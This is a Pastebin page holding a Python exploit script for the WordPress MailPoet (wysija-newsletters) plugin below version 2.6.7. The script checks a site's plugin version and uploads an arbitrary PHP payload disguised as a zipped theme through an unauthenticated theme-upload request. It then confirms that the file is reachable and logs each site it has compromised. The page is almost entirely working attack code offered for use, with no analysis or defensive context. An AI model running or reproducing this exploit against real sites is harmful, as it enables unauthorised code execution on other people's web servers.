Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # -*- coding: utf-8 -*-
- # not coded by me
- from random import choice
- import string
- import sys
- import re
- from zipfile import ZipFile
- from StringIO import StringIO
- import requests
- from colors import red, green, blue # pip install ansicolors
- def version_compare(v1, v2):
- def normalize(v):
- return [int(x) for x in re.sub(r'(\.0+)*$', '', v).split(".")]
- return cmp(normalize(v1), normalize(v2))
- def create_zip_file(theme_name, payload_name, payload):
- files = {
- "%s/%s" % (theme_name, 'style.css'): '',
- "%s/%s" % (theme_name, payload_name): payload
- }
- zip_file = StringIO()
- with ZipFile(zip_file, 'w') as zip:
- for path in files:
- zip.writestr(path, files[path])
- zip_file.seek(0)
- return zip_file
- def check(url):
- readme_url = "%s/wp-content/plugins/wysija-newsletters/readme.txt" % url
- res = requests.get(readme_url, timeout=15, verify=False)
- if res.status_code == 200:
- match = re.search("stable tag: (.*)[\r\n]", res.text, re.I)
- version = match.group(1)
- fun = green if version_compare(version, "2.6.7") < 0 else blue
- print fun("[?] found version: %s" % version)
- return version_compare(version, "2.6.7") < 0
- else:
- raise Exception("error getting version")
- def exploit(url, payload_data):
- theme_name = '.tmp' # better to keep the chaos to one directory.
- payload_name = ''.join([choice(string.letters) for i in range(5)]) + ".php"
- zip_file = create_zip_file(theme_name, payload_name, payload_data)
- files = {'my-theme': ('%s.zip' % theme_name, zip_file, "application/x-zip-compressed")}
- data = {
- "action": "themeupload",
- "submitter": "Upload",
- "overwriteexistingtheme": "on"
- }
- target_url = "%s/wp-admin/admin-post.php?page=wysija_campaigns&action=themes" % url
- payload_url = "%s/%s/%s/%s" % (url, 'wp-content/uploads/wysija/themes', theme_name, payload_name)
- print blue("[?] attempting to upload zip (%s)..." % target_url)
- # Don't rely on checking response, have observed some strange behaviour even with successful upload
- requests.post(target_url, files=files, data=data, verify=False, timeout=15)
- print blue("[?] checking upload (%s)..." % payload_url)
- response = requests.head(payload_url, verify=False, timeout=15)
- if response.status_code == 200:
- print green("[+] found: %s" % payload_url)
- return payload_url
- else:
- raise Exception("upload failed.")
- if __name__ == "__main__":
- if len(sys.argv) > 2:
- payload = open(sys.argv[1]).read()
- wp_url = sys.argv[2]
- try:
- if check(wp_url):
- res = exploit(wp_url, payload)
- if res:
- with open("found-sija.log", "a") as log:
- log.write("%s\n" % res)
- except Exception as e:
- print red("[!] %s - %s" % (wp_url, e))
Add Comment
Please, Sign In to add comment